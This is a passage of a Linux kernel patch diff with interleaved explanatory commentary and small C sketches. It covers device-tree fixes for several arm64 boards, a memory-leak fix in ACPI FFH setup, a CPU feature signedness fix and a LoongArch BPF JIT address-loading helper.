++			clock-names = "cfg_ahb", "ref";
+ 
+ 			resets = <&gcc GCC_QUSB2PHY_PRIM_BCR>;
+ 			status = "disabled";
+diff --git a/arch/arm64/boot/dts/qcom/sm6350-sony-xperia-lena-pdx213.dts b/arch/arm64/boot/dts/qcom/sm6350-sony-xperia-lena-pdx213.dts
+index 94f77d376662e..4916d0db5b47f 100644
+--- a/arch/arm64/boot/dts/qcom/sm6350-sony-xperia-lena-pdx213.dts
++++ b/arch/arm64/boot/dts/qcom/sm6350-sony-xperia-lena-pdx213.dts
+@@ -35,10 +35,10 @@
+ 	gpio-keys {
+ 		compatible = "gpio-keys";
+ 		pinctrl-names = "default";
+-		pinctrl-0 = <&gpio_keys_state>;
++		pinctrl-0 = <&vol_down_n>;
+ 
+ 		key-volume-down {
+-			label = "volume_down";
++			label = "Volume Down";
+ 			linux,code = <KEY_VOLUMEDOWN>;
+ 			gpios = <&pm6350_gpios 2 GPIO_ACTIVE_LOW>;
+ 		};
+@@ -305,14 +305,12 @@
+ };
+ 
+ &pm6350_gpios {
+-	gpio_keys_state: gpio-keys-state {
+-		key-volume-down-pins {
+-			pins = "gpio2";
+-			function = PMIC_GPIO_FUNC_NORMAL;
+-			power-source = <0>;
+-			bias-disable;
+-			input-enable;
+-		};
++	vol_down_n: vol-down-n-state {
++		pins = "gpio2";
++		function = PMIC_GPIO_FUNC_NORMAL;
++		power-source = <0>;
++		bias-disable;
++		input-enable;
+ 	};
+ };
+ 
+diff --git a/arch/arm64/boot/dts/qcom/sm6350.dtsi b/arch/arm64/boot/dts/qcom/sm6350.dtsi
+index 43324bf291c30..00e43a0d2dd67 100644
+--- a/arch/arm64/boot/dts/qcom/sm6350.dtsi
++++ b/arch/arm64/boot/dts/qcom/sm6350.dtsi
+@@ -342,13 +342,12 @@
+ 		};
+ 
+ 		ramoops: ramoops@ffc00000 {
+-			compatible = "removed-dma-pool", "ramoops";
+-			reg = <0 0xffc00000 0 0x00100000>;
++			compatible = "ramoops";
++			reg = <0 0xffc00000 0 0x100000>;
+ 			record-size = <0x1000>;
+ 			console-size = <0x40000>;
+-			ftrace-size = <0x0>;
+ 			msg-size = <0x20000 0x20000>;
+-			cc-size = <0x0>;
++			ecc-size = <16>;
+ 			no-map;
+ 		};
+ 
+diff --git a/arch/arm64/boot/dts/qcom/sm8150-sony-xperia-kumano.dtsi b/arch/arm64/boot/dts/qcom/sm8150-sony-xperia-kumano.dtsi
+index c958a8b167303..fd8c0097072ab 100644
+--- a/arch/arm64/boot/dts/qcom/sm8150-sony-xperia-kumano.dtsi
++++ b/arch/arm64/boot/dts/qcom/sm8150-sony-xperia-kumano.dtsi
+@@ -33,9 +33,10 @@
+ 		framebuffer: framebuffer@9c000000 {
+ 			compatible = "simple-framebuffer";
+ 			reg = <0 0x9c000000 0 0x2300000>;
+-			width = <1644>;
+-			height = <3840>;
+-			stride = <(1644 * 4)>;
++			/* Griffin BL initializes in 2.5k mode, not 4k */
++			width = <1096>;
++			height = <2560>;
++			stride = <(1096 * 4)>;
+ 			format = "a8r8g8b8";
+ 			/*
+ 			 * That's (going to be) a lot of clocks, but it's necessary due
+diff --git a/arch/arm64/boot/dts/qcom/sm8350-sony-xperia-sagami-pdx214.dts b/arch/arm64/boot/dts/qcom/sm8350-sony-xperia-sagami-pdx214.dts
+index cc650508dc2d6..e6824c8c2774d 100644
+--- a/arch/arm64/boot/dts/qcom/sm8350-sony-xperia-sagami-pdx214.dts
++++ b/arch/arm64/boot/dts/qcom/sm8350-sony-xperia-sagami-pdx214.dts
+@@ -17,3 +17,26 @@
+ 	height = <2520>;
+ 	stride = <(1080 * 4)>;
+ };
++
++&pm8350b_gpios {
++	gpio-line-names = "NC", /* GPIO_1 */
++			  "NC",
++			  "NC",
++			  "NC",
++			  "SNAPSHOT_N",
++			  "NC",
++			  "NC",
++			  "FOCUS_N";
++};
++
++&pm8350c_gpios {
++	gpio-line-names = "FL_STROBE_TRIG_WIDE", /* GPIO_1 */
++			  "FL_STROBE_TRIG_TELE",
++			  "NC",
++			  "NC",
++			  "NC",
++			  "RGBC_IR_PWR_EN",
++			  "NC",
++			  "NC",
++			  "WIDEC_PWR_EN";
++};
+diff --git a/arch/arm64/boot/dts/qcom/sm8350-sony-xperia-sagami-pdx215.dts b/arch/arm64/boot/dts/qcom/sm8350-sony-xperia-sagami-pdx215.dts
+index c74c973a69d2d..c6f402c3ef352 100644
+--- a/arch/arm64/boot/dts/qcom/sm8350-sony-xperia-sagami-pdx215.dts
++++ b/arch/arm64/boot/dts/qcom/sm8350-sony-xperia-sagami-pdx215.dts
+@@ -12,6 +12,93 @@
+ 	compatible = "sony,pdx215-generic", "qcom,sm8350";
+ };
+ 
++&i2c13 {
++	pmic@75 {
++		compatible = "dlg,slg51000";
++		reg = <0x75>;
++		dlg,cs-gpios = <&pm8350b_gpios 1 GPIO_ACTIVE_HIGH>;
++
++		pinctrl-names = "default";
++		pinctrl-0 = <&cam_pwr_a_cs>;
++
++		regulators {
++			slg51000_a_ldo1: ldo1 {
++				regulator-name = "slg51000_a_ldo1";
++				regulator-min-microvolt = <2400000>;
++				regulator-max-microvolt = <3300000>;
++			};
++
++			slg51000_a_ldo2: ldo2 {
++				regulator-name = "slg51000_a_ldo2";
++				regulator-min-microvolt = <2400000>;
++				regulator-max-microvolt = <3300000>;
++			};
++
++			slg51000_a_ldo3: ldo3 {
++				regulator-name = "slg51000_a_ldo3";
++				regulator-min-microvolt = <1200000>;
++				regulator-max-microvolt = <3750000>;
++			};
++
++			slg51000_a_ldo4: ldo4 {
++				regulator-name = "slg51000_a_ldo4";
++				regulator-min-microvolt = <1200000>;
++				regulator-max-microvolt = <3750000>;
++			};
++
++			slg51000_a_ldo5: ldo5 {
++				regulator-name = "slg51000_a_ldo5";
++				regulator-min-microvolt = <500000>;
++				regulator-max-microvolt = <1200000>;
++			};
++
++			slg51000_a_ldo6: ldo6 {
++				regulator-name = "slg51000_a_ldo6";
++				regulator-min-microvolt = <500000>;
++				regulator-max-microvolt = <1200000>;
++			};
++
++			slg51000_a_ldo7: ldo7 {
++				regulator-name = "slg51000_a_ldo7";
++				regulator-min-microvolt = <1200000>;
++				regulator-max-microvolt = <3750000>;
++			};
++		};
++	};
++};
++
++&pm8350b_gpios {
++	gpio-line-names = "CAM_PWR_A_CS", /* GPIO_1 */
++			  "NC",
++			  "NC",
++			  "NC",
++			  "SNAPSHOT_N",
++			  "CAM_PWR_LD_EN",
++			  "NC",
++			  "FOCUS_N";
++
++	cam_pwr_a_cs: cam-pwr-a-cs-state {
++		pins = "gpio1";
++		function = "normal";
++		qcom,drive-strength = <PMIC_GPIO_STRENGTH_LOW>;
++		power-source = <1>;
++		drive-push-pull;
++		output-high;
++	};
++};
++
++&pm8350c_gpios {
++	gpio-line-names = "FL_STROBE_TRIG_WIDE", /* GPIO_1 */
++			  "FL_STROBE_TRIG_TELE",
++			  "NC",
++			  "WLC_TXPWR_EN",
++			  "NC",
++			  "RGBC_IR_PWR_EN",
++			  "NC",
++			  "NC",
++			  "WIDEC_PWR_EN";
++};
++
+ &tlmm {
+ 	gpio-line-names = "APPS_I2C_0_SDA", /* GPIO_0 */
+ 			  "APPS_I2C_0_SCL",
+diff --git a/arch/arm64/boot/dts/qcom/sm8350-sony-xperia-sagami.dtsi b/arch/arm64/boot/dts/qcom/sm8350-sony-xperia-sagami.dtsi
+index 1f2d660f8f86c..8df6ccbedfae7 100644
+--- a/arch/arm64/boot/dts/qcom/sm8350-sony-xperia-sagami.dtsi
++++ b/arch/arm64/boot/dts/qcom/sm8350-sony-xperia-sagami.dtsi
+@@ -3,6 +3,7 @@
+  * Copyright (c) 2021, Konrad Dybcio <konrad.dybcio@somainline.org>
+  */
+ 
++#include <dt-bindings/pinctrl/qcom,pmic-gpio.h>
+ #include <dt-bindings/regulator/qcom,rpmh-regulator.h>
+ #include "sm8350.dtsi"
+ #include "pm8350.dtsi"
+@@ -48,7 +49,35 @@
+ 	gpio-keys {
+ 		compatible = "gpio-keys";
+ 
+-		/* For reasons still unknown, GAssist key and Camera Focus/Shutter don't work.. */
++		pinctrl-names = "default";
++		pinctrl-0 = <&focus_n &snapshot_n &vol_down_n &g_assist_n>;
++
++		key-camera-focus {
++			label = "Camera Focus";
++			linux,code = <KEY_CAMERA_FOCUS>;
++			gpios = <&pm8350b_gpios 8 GPIO_ACTIVE_LOW>;
++			debounce-interval = <15>;
++			linux,can-disable;
++			wakeup-source;
++		};
++
++		key-camera-snapshot {
++			label = "Camera Snapshot";
++			linux,code = <KEY_CAMERA>;
++			gpios = <&pm8350b_gpios 5 GPIO_ACTIVE_LOW>;
++			debounce-interval = <15>;
++			linux,can-disable;
++			wakeup-source;
++		};
++
++		key-google-assist {
++			label = "Google Assistant Key";
++			gpios = <&pm8350_gpios 9 GPIO_ACTIVE_LOW>;
++			linux,code = <KEY_LEFTMETA>;
++			debounce-interval = <15>;
++			linux,can-disable;
++			wakeup-source;
++		};
+ 
+ 		key-vol-down {
+ 			label = "Volume Down";
+@@ -56,7 +85,7 @@
+ 			gpios = <&pmk8350_gpios 3 GPIO_ACTIVE_LOW>;
+ 			debounce-interval = <15>;
+ 			linux,can-disable;
+-			gpio-key,wakeup;
++			wakeup-source;
+ 		};
+ 	};
+ 
+@@ -506,7 +535,6 @@
+ 	clock-frequency = <100000>;
+ 
+ 	/* Qualcomm PM8008i/PM8008j (?) @ 8, 9, c, d */
+-	/* Dialog SLG51000 CMIC @ 75 */
+ };
+ 
+ &i2c15 {
+@@ -534,6 +562,60 @@
+ 	firmware-name = "qcom/sm8350/Sony/sagami/modem.mbn";
+ };
+ 
++&pm8350_gpios {
++	gpio-line-names = "ASSIGN1_THERM", /* GPIO_1 */
++			  "LCD_ID",
++			  "SDR_MMW_THERM",
++			  "RF_ID",
++			  "NC",
++			  "FP_LDO_EN",
++			  "SP_ARI_PWR_ALARM",
++			  "NC",
++			  "G_ASSIST_N",
++			  "PM8350_OPTION"; /* GPIO_10 */
++
++	g_assist_n: g-assist-n-state {
++		pins = "gpio9";
++		function = "normal";
++		power-source = <1>;
++		bias-pull-up;
++		input-enable;
++	};
++};
++
++&pm8350b_gpios {
++	snapshot_n: snapshot-n-state {
++		pins = "gpio5";
++		function = "normal";
++		power-source = <0>;
++		bias-pull-up;
++		input-enable;
++	};
++
++	focus_n: focus-n-state {
++		pins = "gpio8";
++		function = "normal";
++		power-source = <0>;
++		input-enable;
++		bias-pull-up;
++	};
++};
++
++&pmk8350_gpios {
++	gpio-line-names = "NC", /* GPIO_1 */
++			  "NC",
++			  "VOL_DOWN_N",
++			  "PMK8350_OPTION";
++
++	vol_down_n: vol-down-n-state {
++		pins = "gpio3";
++		function = "normal";
++		power-source = <0>;
++		bias-pull-up;
++		input-enable;
++	};
++};
++
+ &pmk8350_rtc {
+ 	status = "okay";
+ };
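
This hunk does two things: it wires up the previously dead focus/snapshot/assistant keys (each now has a bias-pull-up pin configuration on the owning PMIC GPIO block plus a gpio-keys entry), and it replaces the deprecated gpio-key,wakeup property with the generic wakeup-source. Once registered, the keys arrive as ordinary input events; a userspace sketch for watching them, where the event node path is an assumption:

  #include <fcntl.h>
  #include <linux/input.h>
  #include <stdio.h>
  #include <unistd.h>

  int main(void)
  {
          struct input_event ev;
          int fd = open("/dev/input/event0", O_RDONLY); /* assumed node */

          if (fd < 0)
                  return 1;
          while (read(fd, &ev, sizeof(ev)) == sizeof(ev)) {
                  if (ev.type == EV_KEY && ev.value == 1 &&
                      (ev.code == KEY_CAMERA || ev.code == KEY_CAMERA_FOCUS))
                          printf("key %u pressed\n", ev.code);
          }
          close(fd);
          return 0;
  }
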
+diff --git a/arch/arm64/boot/dts/qcom/sm8350.dtsi b/arch/arm64/boot/dts/qcom/sm8350.dtsi
+index fb3cd20a82b5e..646c64f0d1e28 100644
+--- a/arch/arm64/boot/dts/qcom/sm8350.dtsi
++++ b/arch/arm64/boot/dts/qcom/sm8350.dtsi
+@@ -1043,8 +1043,6 @@
+ 				interrupts = <GIC_SPI 604 IRQ_TYPE_LEVEL_HIGH>;
+ 				power-domains = <&rpmhpd SM8350_CX>;
+ 				operating-points-v2 = <&qup_opp_table_100mhz>;
+-				#address-cells = <1>;
+-				#size-cells = <0>;
+ 				status = "disabled";
+ 			};
+ 
+diff --git a/arch/arm64/boot/dts/qcom/sm8450-sony-xperia-nagara.dtsi b/arch/arm64/boot/dts/qcom/sm8450-sony-xperia-nagara.dtsi
+index 38256226d2297..e437e9a12069f 100644
+--- a/arch/arm64/boot/dts/qcom/sm8450-sony-xperia-nagara.dtsi
++++ b/arch/arm64/boot/dts/qcom/sm8450-sony-xperia-nagara.dtsi
+@@ -534,17 +534,17 @@
+ };
+ 
+ &remoteproc_adsp {
+-	firmware-name = "qcom/sm8350/Sony/nagara/adsp.mbn";
++	firmware-name = "qcom/sm8450/Sony/nagara/adsp.mbn";
+ 	status = "okay";
+ };
+ 
+ &remoteproc_cdsp {
+-	firmware-name = "qcom/sm8350/Sony/nagara/cdsp.mbn";
++	firmware-name = "qcom/sm8450/Sony/nagara/cdsp.mbn";
+ 	status = "okay";
+ };
+ 
+ &remoteproc_slpi {
+-	firmware-name = "qcom/sm8350/Sony/nagara/slpi.mbn";
++	firmware-name = "qcom/sm8450/Sony/nagara/slpi.mbn";
+ 	status = "okay";
+ };
+ 
+diff --git a/arch/arm64/boot/dts/qcom/sm8450.dtsi b/arch/arm64/boot/dts/qcom/sm8450.dtsi
+index 570475040d95c..f57980a32b433 100644
+--- a/arch/arm64/boot/dts/qcom/sm8450.dtsi
++++ b/arch/arm64/boot/dts/qcom/sm8450.dtsi
+@@ -997,8 +997,6 @@
+ 				pinctrl-names = "default";
+ 				pinctrl-0 = <&qup_uart20_default>;
+ 				interrupts = <GIC_SPI 587 IRQ_TYPE_LEVEL_HIGH>;
+-				#address-cells = <1>;
+-				#size-cells = <0>;
+ 				status = "disabled";
+ 			};
+ 
+@@ -1391,8 +1389,6 @@
+ 				pinctrl-names = "default";
+ 				pinctrl-0 = <&qup_uart7_tx>, <&qup_uart7_rx>;
+ 				interrupts = <GIC_SPI 608 IRQ_TYPE_LEVEL_HIGH>;
+-				#address-cells = <1>;
+-				#size-cells = <0>;
+ 				status = "disabled";
+ 			};
+ 		};
+@@ -2263,7 +2259,7 @@
+ 			reg = <0 0x33b0000 0 0x2000>;
+ 			interrupts-extended = <&intc GIC_SPI 496 IRQ_TYPE_LEVEL_HIGH>,
+ 					      <&intc GIC_SPI 520 IRQ_TYPE_LEVEL_HIGH>;
+-			interrupt-names = "core", "wake";
++			interrupt-names = "core", "wakeup";
+ 
+ 			clocks = <&vamacro>;
+ 			clock-names = "iface";
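
interrupt-names is effectively ABI with the driver, which fetches the optional wake interrupt by name; "wake" therefore made the lookup miss. A generic platform-driver sketch of such a by-name lookup (illustrative, not the literal SoundWire driver code):

  /* Misses (returns a negative errno) if the DT names the line "wake". */
  int irq = platform_get_irq_byname_optional(pdev, "wakeup");

  if (irq > 0)
          setup_wake_irq(irq);    /* assumed helper */
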
+diff --git a/arch/arm64/boot/dts/renesas/beacon-renesom-baseboard.dtsi b/arch/arm64/boot/dts/renesas/beacon-renesom-baseboard.dtsi
+index 8166e3c1ff4e5..cafde91b4721b 100644
+--- a/arch/arm64/boot/dts/renesas/beacon-renesom-baseboard.dtsi
++++ b/arch/arm64/boot/dts/renesas/beacon-renesom-baseboard.dtsi
+@@ -437,20 +437,6 @@
+ 		};
+ 	};
+ 
+-	/* 0 - lcd_reset */
+-	/* 1 - lcd_pwr */
+-	/* 2 - lcd_select */
+-	/* 3 - backlight-enable */
+-	/* 4 - Touch_shdwn */
+-	/* 5 - LCD_H_pol */
+-	/* 6 - lcd_V_pol */
+-	gpio_exp1: gpio@20 {
+-		compatible = "onnn,pca9654";
+-		reg = <0x20>;
+-		gpio-controller;
+-		#gpio-cells = <2>;
+-	};
+-
+ 	touchscreen@26 {
+ 		compatible = "ilitek,ili2117";
+ 		reg = <0x26>;
+@@ -482,6 +468,16 @@
+ 			};
+ 		};
+ 	};
++
++	gpio_exp1: gpio@70 {
++		compatible = "nxp,pca9538";
++		reg = <0x70>;
++		gpio-controller;
++		#gpio-cells = <2>;
++		gpio-line-names = "lcd_reset", "lcd_pwr", "lcd_select",
++				  "backlight-enable", "Touch_shdwn",
++				  "LCD_H_pol", "lcd_V_pol";
++	};
+ };
+ 
+ &lvds0 {
+diff --git a/arch/arm64/boot/dts/ti/k3-am62-main.dtsi b/arch/arm64/boot/dts/ti/k3-am62-main.dtsi
+index 072903649d6ee..ae1ec58117c35 100644
+--- a/arch/arm64/boot/dts/ti/k3-am62-main.dtsi
++++ b/arch/arm64/boot/dts/ti/k3-am62-main.dtsi
+@@ -413,7 +413,7 @@
+ 		#address-cells = <1>;
+ 		#size-cells = <0>;
+ 		power-domains = <&k3_pds 141 TI_SCI_PD_EXCLUSIVE>;
+-		clocks = <&k3_clks 172 0>;
++		clocks = <&k3_clks 141 0>;
+ 		status = "disabled";
+ 	};
+ 
+@@ -424,7 +424,7 @@
+ 		#address-cells = <1>;
+ 		#size-cells = <0>;
+ 		power-domains = <&k3_pds 142 TI_SCI_PD_EXCLUSIVE>;
+-		clocks = <&k3_clks 173 0>;
++		clocks = <&k3_clks 142 0>;
+ 		status = "disabled";
+ 	};
+ 
+@@ -435,7 +435,7 @@
+ 		#address-cells = <1>;
+ 		#size-cells = <0>;
+ 		power-domains = <&k3_pds 143 TI_SCI_PD_EXCLUSIVE>;
+-		clocks = <&k3_clks 174 0>;
++		clocks = <&k3_clks 143 0>;
+ 		status = "disabled";
+ 	};
+ 
+diff --git a/arch/arm64/boot/dts/ti/k3-j7200-common-proc-board.dts b/arch/arm64/boot/dts/ti/k3-j7200-common-proc-board.dts
+index 6240856e48631..0d39d6b8cc0ca 100644
+--- a/arch/arm64/boot/dts/ti/k3-j7200-common-proc-board.dts
++++ b/arch/arm64/boot/dts/ti/k3-j7200-common-proc-board.dts
+@@ -80,7 +80,7 @@
+ 	};
+ };
+ 
+-&wkup_pmx0 {
++&wkup_pmx2 {
+ 	mcu_cpsw_pins_default: mcu-cpsw-pins-default {
+ 		pinctrl-single,pins = <
+ 			J721E_WKUP_IOPAD(0x0068, PIN_OUTPUT, 0) /* MCU_RGMII1_TX_CTL */
+diff --git a/arch/arm64/boot/dts/ti/k3-j7200-mcu-wakeup.dtsi b/arch/arm64/boot/dts/ti/k3-j7200-mcu-wakeup.dtsi
+index fe669deba4896..de56a0165bd0c 100644
+--- a/arch/arm64/boot/dts/ti/k3-j7200-mcu-wakeup.dtsi
++++ b/arch/arm64/boot/dts/ti/k3-j7200-mcu-wakeup.dtsi
+@@ -56,7 +56,34 @@
+ 	wkup_pmx0: pinctrl@4301c000 {
+ 		compatible = "pinctrl-single";
+ 		/* Proxy 0 addressing */
+-		reg = <0x00 0x4301c000 0x00 0x178>;
++		reg = <0x00 0x4301c000 0x00 0x34>;
++		#pinctrl-cells = <1>;
++		pinctrl-single,register-width = <32>;
++		pinctrl-single,function-mask = <0xffffffff>;
++	};
++
++	wkup_pmx1: pinctrl@0x4301c038 {
++		compatible = "pinctrl-single";
++		/* Proxy 0 addressing */
++		reg = <0x00 0x4301c038 0x00 0x8>;
++		#pinctrl-cells = <1>;
++		pinctrl-single,register-width = <32>;
++		pinctrl-single,function-mask = <0xffffffff>;
++	};
++
++	wkup_pmx2: pinctrl@0x4301c068 {
++		compatible = "pinctrl-single";
++		/* Proxy 0 addressing */
++		reg = <0x00 0x4301c068 0x00 0xec>;
++		#pinctrl-cells = <1>;
++		pinctrl-single,register-width = <32>;
++		pinctrl-single,function-mask = <0xffffffff>;
++	};
++
++	wkup_pmx3: pinctrl@0x4301c174 {
++		compatible = "pinctrl-single";
++		/* Proxy 0 addressing */
++		reg = <0x00 0x4301c174 0x00 0x20>;
+ 		#pinctrl-cells = <1>;
+ 		pinctrl-single,register-width = <32>;
+ 		pinctrl-single,function-mask = <0xffffffff>;
+diff --git a/arch/arm64/boot/dts/xilinx/zynqmp.dtsi b/arch/arm64/boot/dts/xilinx/zynqmp.dtsi
+index 4325cb8526edc..f92df478f0eea 100644
+--- a/arch/arm64/boot/dts/xilinx/zynqmp.dtsi
++++ b/arch/arm64/boot/dts/xilinx/zynqmp.dtsi
+@@ -858,6 +858,7 @@
+ 				clock-names = "bus_early", "ref";
+ 				iommus = <&smmu 0x860>;
+ 				snps,quirk-frame-length-adjustment = <0x20>;
++				snps,resume-hs-terminations;
+ 				/* dma-coherent; */
+ 			};
+ 		};
+@@ -884,6 +885,7 @@
+ 				clock-names = "bus_early", "ref";
+ 				iommus = <&smmu 0x861>;
+ 				snps,quirk-frame-length-adjustment = <0x20>;
++				snps,resume-hs-terminations;
+ 				/* dma-coherent; */
+ 			};
+ 		};
+diff --git a/arch/arm64/kernel/acpi.c b/arch/arm64/kernel/acpi.c
+index 378453faa87e1..dba8fcec7f33d 100644
+--- a/arch/arm64/kernel/acpi.c
++++ b/arch/arm64/kernel/acpi.c
+@@ -435,10 +435,6 @@ int acpi_ffh_address_space_arch_setup(void *handler_ctxt, void **region_ctxt)
+ 	enum arm_smccc_conduit conduit;
+ 	struct acpi_ffh_data *ffh_ctxt;
+ 
+-	ffh_ctxt = kzalloc(sizeof(*ffh_ctxt), GFP_KERNEL);
+-	if (!ffh_ctxt)
+-		return -ENOMEM;
+-
+ 	if (arm_smccc_get_version() < ARM_SMCCC_VERSION_1_2)
+ 		return -EOPNOTSUPP;
+ 
+@@ -448,6 +444,10 @@ int acpi_ffh_address_space_arch_setup(void *handler_ctxt, void **region_ctxt)
+ 		return -EOPNOTSUPP;
+ 	}
+ 
++	ffh_ctxt = kzalloc(sizeof(*ffh_ctxt), GFP_KERNEL);
++	if (!ffh_ctxt)
++		return -ENOMEM;
++
+ 	if (conduit == SMCCC_CONDUIT_SMC) {
+ 		ffh_ctxt->invoke_ffh_fn = __arm_smccc_smc;
+ 		ffh_ctxt->invoke_ffh64_fn = arm_smccc_1_2_smc;
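
The reordering fixes a leak: kzalloc() used to run before the SMCCC version and conduit checks, so every -EOPNOTSUPP return dropped a live allocation. Reduced to its shape, the rule is to validate cheap preconditions first and allocate last:

  /* Generic sketch of the fix, not the full function. */
  static int ffh_setup(struct acpi_ffh_data **out)
  {
          struct acpi_ffh_data *ctx;

          if (arm_smccc_get_version() < ARM_SMCCC_VERSION_1_2)
                  return -EOPNOTSUPP;      /* nothing allocated yet */

          ctx = kzalloc(sizeof(*ctx), GFP_KERNEL);
          if (!ctx)
                  return -ENOMEM;

          *out = ctx;
          return 0;
  }
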
+diff --git a/arch/arm64/kernel/cpufeature.c b/arch/arm64/kernel/cpufeature.c
+index a77315b338e61..ee40dca9f28ef 100644
+--- a/arch/arm64/kernel/cpufeature.c
++++ b/arch/arm64/kernel/cpufeature.c
+@@ -2777,7 +2777,7 @@ static const struct arm64_cpu_capabilities arm64_elf_hwcaps[] = {
+ 	HWCAP_CAP(SYS_ID_AA64PFR0_EL1, ID_AA64PFR0_EL1_FP_SHIFT, 4, FTR_SIGNED, 1, CAP_HWCAP, KERNEL_HWCAP_FPHP),
+ 	HWCAP_CAP(SYS_ID_AA64PFR0_EL1, ID_AA64PFR0_EL1_AdvSIMD_SHIFT, 4, FTR_SIGNED, 0, CAP_HWCAP, KERNEL_HWCAP_ASIMD),
+ 	HWCAP_CAP(SYS_ID_AA64PFR0_EL1, ID_AA64PFR0_EL1_AdvSIMD_SHIFT, 4, FTR_SIGNED, 1, CAP_HWCAP, KERNEL_HWCAP_ASIMDHP),
+-	HWCAP_CAP(SYS_ID_AA64PFR0_EL1, ID_AA64PFR0_EL1_DIT_SHIFT, 4, FTR_SIGNED, 1, CAP_HWCAP, KERNEL_HWCAP_DIT),
++	HWCAP_CAP(SYS_ID_AA64PFR0_EL1, ID_AA64PFR0_EL1_DIT_SHIFT, 4, FTR_UNSIGNED, 1, CAP_HWCAP, KERNEL_HWCAP_DIT),
+ 	HWCAP_CAP(SYS_ID_AA64ISAR1_EL1, ID_AA64ISAR1_EL1_DPB_SHIFT, 4, FTR_UNSIGNED, 1, CAP_HWCAP, KERNEL_HWCAP_DCPOP),
+ 	HWCAP_CAP(SYS_ID_AA64ISAR1_EL1, ID_AA64ISAR1_EL1_DPB_SHIFT, 4, FTR_UNSIGNED, 2, CAP_HWCAP, KERNEL_HWCAP_DCPODP),
+ 	HWCAP_CAP(SYS_ID_AA64ISAR1_EL1, ID_AA64ISAR1_EL1_JSCVT_SHIFT, 4, FTR_UNSIGNED, 1, CAP_HWCAP, KERNEL_HWCAP_JSCVT),
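
ID_AA64PFR0_EL1.DIT is an unsigned 4-bit field (bits 51:48); matching it as FTR_SIGNED means any future value with bit 3 set would be sign-extended negative and fail the >= 1 capability comparison. A standalone demonstration of the two read styles (two's-complement arithmetic assumed):

  #include <stdio.h>
  #include <stdint.h>

  static long long field_unsigned(uint64_t reg, int shift)
  {
          return (reg >> shift) & 0xf;
  }

  static long long field_signed(uint64_t reg, int shift)
  {
          return (int64_t)(reg << (64 - shift - 4)) >> 60;
  }

  int main(void)
  {
          uint64_t reg = 0xfULL << 48;    /* hypothetical DIT = 0b1111 */

          /* unsigned: 15 (>= 1, present); signed: -1 (wrongly absent) */
          printf("%lld %lld\n", field_unsigned(reg, 48),
                 field_signed(reg, 48));
          return 0;
  }
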
+diff --git a/arch/arm64/mm/copypage.c b/arch/arm64/mm/copypage.c
+index 8dd5a8fe64b4f..4aadcfb017545 100644
+--- a/arch/arm64/mm/copypage.c
++++ b/arch/arm64/mm/copypage.c
+@@ -22,7 +22,8 @@ void copy_highpage(struct page *to, struct page *from)
+ 	copy_page(kto, kfrom);
+ 
+ 	if (system_supports_mte() && page_mte_tagged(from)) {
+-		page_kasan_tag_reset(to);
++		if (kasan_hw_tags_enabled())
++			page_kasan_tag_reset(to);
+ 		/* It's a new page, shouldn't have been tagged yet */
+ 		WARN_ON_ONCE(!try_page_mte_tagging(to));
+ 		mte_copy_page_tags(kto, kfrom);
+diff --git a/arch/arm64/tools/sysreg b/arch/arm64/tools/sysreg
+index 184e58fd5631a..e8fb6684d7f3c 100644
+--- a/arch/arm64/tools/sysreg
++++ b/arch/arm64/tools/sysreg
+@@ -689,17 +689,17 @@ EndEnum
+ Enum	11:8	FPDP
+ 	0b0000	NI
+ 	0b0001	VFPv2
+-	0b0001	VFPv3
++	0b0010	VFPv3
+ EndEnum
+ Enum	7:4	FPSP
+ 	0b0000	NI
+ 	0b0001	VFPv2
+-	0b0001	VFPv3
++	0b0010	VFPv3
+ EndEnum
+ Enum	3:0	SIMDReg
+ 	0b0000	NI
+ 	0b0001	IMP_16x64
+-	0b0001	IMP_32x64
++	0b0010	IMP_32x64
+ EndEnum
+ EndSysreg
+ 
+@@ -718,7 +718,7 @@ EndEnum
+ Enum	23:20	SIMDHP
+ 	0b0000	NI
+ 	0b0001	SIMDHP
+-	0b0001	SIMDHP_FLOAT
++	0b0010	SIMDHP_FLOAT
+ EndEnum
+ Enum	19:16	SIMDSP
+ 	0b0000	NI
+diff --git a/arch/loongarch/net/bpf_jit.c b/arch/loongarch/net/bpf_jit.c
+index c4b1947ebf768..288003a9f0cae 100644
+--- a/arch/loongarch/net/bpf_jit.c
++++ b/arch/loongarch/net/bpf_jit.c
+@@ -841,7 +841,7 @@ static int build_insn(const struct bpf_insn *insn, struct jit_ctx *ctx, bool ext
+ 		if (ret < 0)
+ 			return ret;
+ 
+-		move_imm(ctx, t1, func_addr, is32);
++		move_addr(ctx, t1, func_addr);
+ 		emit_insn(ctx, jirl, t1, LOONGARCH_GPR_RA, 0);
+ 		move_reg(ctx, regmap[BPF_REG_0], LOONGARCH_GPR_A0);
+ 		break;
+diff --git a/arch/loongarch/net/bpf_jit.h b/arch/loongarch/net/bpf_jit.h
+index ca708024fdd3e..c335dc4eed370 100644
+--- a/arch/loongarch/net/bpf_jit.h
++++ b/arch/loongarch/net/bpf_jit.h
+@@ -82,6 +82,27 @@ static inline void emit_sext_32(struct jit_ctx *ctx, enum loongarch_gpr reg, boo
+ 	emit_insn(ctx, addiw, reg, reg, 0);
+ }
+ 
++static inline void move_addr(struct jit_ctx *ctx, enum loongarch_gpr rd, u64 addr)
++{
++	u64 imm_11_0, imm_31_12, imm_51_32, imm_63_52;
++
++	/* lu12iw rd, imm_31_12 */
++	imm_31_12 = (addr >> 12) & 0xfffff;
++	emit_insn(ctx, lu12iw, rd, imm_31_12);
++
++	/* ori rd, rd, imm_11_0 */
++	imm_11_0 = addr & 0xfff;
++	emit_insn(ctx, ori, rd, rd, imm_11_0);
++
++	/* lu32id rd, imm_51_32 */
++	imm_51_32 = (addr >> 32) & 0xfffff;
++	emit_insn(ctx, lu32id, rd, imm_51_32);
++
++	/* lu52id rd, rd, imm_63_52 */
++	imm_63_52 = (addr >> 52) & 0xfff;
++	emit_insn(ctx, lu52id, rd, rd, imm_63_52);
++}
++
+ static inline void move_imm(struct jit_ctx *ctx, enum loongarch_gpr rd, long imm, bool is32)
+ {
+ 	long imm_11_0, imm_31_12, imm_51_32, imm_63_52, imm_51_0, imm_51_31;
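
move_imm() is allowed to exploit sign extension to emit a shorter sequence, which is fine for immediates but wrong for a call target that must be materialised bit-exactly; move_addr() always emits the full four-instruction sequence instead. A host-side model of that split, checking that no bits are lost (per-instruction semantics paraphrased from the LoongArch ISA):

  #include <assert.h>
  #include <stdint.h>

  /* lu12i.w writes bits 31:12 and sign-extends bit 31 upward; ori
   * fills bits 11:0; lu32i.d replaces bits 51:32; lu52i.d replaces
   * bits 63:52 -- so every bit of addr survives. */
  static uint64_t move_addr_model(uint64_t addr)
  {
          uint64_t r;

          r = (addr >> 12) & 0xfffff;                 /* lu12i.w */
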